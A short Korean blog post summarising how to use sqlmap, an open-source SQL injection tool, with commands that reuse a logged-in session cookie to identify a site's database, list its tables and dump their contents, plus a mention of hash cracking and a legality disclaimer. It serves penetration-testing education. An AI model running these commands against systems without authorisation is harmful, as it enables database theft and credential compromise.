sqlmap

sqlmap 사용법 정리

netwaif
The professional publishing platform
More posts by netwaif.

netwaif

20 Jun 2023•2 min read

sqlmap

- SQL Injection 결함을 감지 및 악용할 수 있는, Python 으로 작성된 오픈 소스 침투 테스트 도구
- mysql, postgresql, oracle, microsoft sql server 등을 포함한 모든 최신 데이터베이스에서 작동
- DB 취약 여부 확인부터 DB, 테이블, 컬럼, 데이터 탈취까지의 SQLI 공격 기술을 자동화한 Tool
다음과 같은 일반적인 SQL Injection 기술을 자동화
1) Error Based
2) Time Delay
3) Stacked Queries
4) Boolean Based
5) Union Based

cookie 옵션은 로그인한 상태에서 웹브라우저 콘솔에서 document.cookie로 cookie 값을 복사해서 입력한다.

Copy

sqlmap -u "https://[ip 주소]/bbsview.php?no=3&current_page=1" --cookie="[cookie 정보]"

DB 정보를 검색한다.

Copy

sqlmap -u "https://[ip 주소]/bbsview.php?no=3&current_page=1" --cookie="[cookie 정보]" --current-db

DB에서 table 정보를 검색한다.

Copy

sqlmap -u "https://[ip 주소]/bbsview.php?no=3&current_page=1" --cookie="[cookie 정보]" -D [DB 명] --tables

table 세부 정보를 검색한다.

Copy

sqlmap -u "https://[ip 주소]/bbsview.php?no=3&current_page=1" --cookie="[cookie 정보]" -D [DB 명] -T [table 명] --dump

user table 에 패스워드가 해쉬값으로 되있는 경우 해쉬 값을 크랙하는 기능도 있다.
합법적인 권한과 허가 없이 다른 사람의 시스템을 대상으로 수행하는 것은 불법이다.
윤리적이고 합법적인 사용을 준수해야 한다.

sqlmap

netwaif

netwaif

sqlmap

BeEF

How to inject payload to PE

bettercap command